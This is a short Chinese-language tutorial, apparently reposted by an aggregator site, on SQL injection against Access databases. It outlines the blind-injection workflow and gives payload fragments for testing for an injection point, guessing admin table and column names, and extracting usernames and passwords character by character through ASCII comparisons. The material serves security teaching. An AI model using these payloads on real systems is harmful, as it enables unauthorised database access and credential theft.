第四章SQL注入----

Posted 幸运儿mnmnmn

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了第四章SQL注入----相关的知识,希望对你有一定的参考价值。

SQL注入定义:

将用户输入的内容,拼接到SQL语句中,一起提交到数据库  产生SQL注入威胁。

$id= $_GET[\'id\']

$id= $_POST[\'id\']

 

access注入基本流程:

1.判断有无注入

2.猜解表名

3.猜解字段

4.猜解管理员ID

5.猜解用户名和密码长度

6.猜解用户名和密码

逐字猜解法

1、判断有无注入点and 1=1 and 1=2

2、猜表名(一般的表的名称无非是admin adminuseruser pass password ) and (Select count(*) from 表名)<>0 and exists (select * from 表名)

3、猜列名and (Select count(列名) from 表名)<>0 and exists (select 列名from 表名)逐字猜解法

4、判断内容长度and (select top 1 len(user_name) from admin)=5(user_name的长度=5,正常则=5,也可以用>,<去判断)

5、截取字符串并转换为ascii码进行数值比较,判断ascii码值:

and (select top 1 asc(mid(user_name,1,1)) from admin)=97 判断第一位97代表‘a’ascll值)

and (select top 1 asc(mid(user_name,2,1)) from admin)=97 判断第二位

 

 

数据库  默认的数据库

以上是关于第四章SQL注入----的主要内容,如果未能解决你的问题,请参考以下文章

《11招玩转网络安全》之第四招:low级别的DVWA SQL注入

sqlilabs(SQL注入)小白通基础通关笔记(专针对小白)(第四关Less-4)

网络安全从入门到精通(第四章-2)GET&POST&HEAD注入

WEB安全番外第四篇--关于SQL盲注

SPRING IN ACTION 第4版笔记-第四章ASPECT-ORIENTED SPRING-011-注入AspectJ Aspect

常见注入手法第四讲,SetWindowsHookEx全局钩子注入.以及注入QQ32位实战.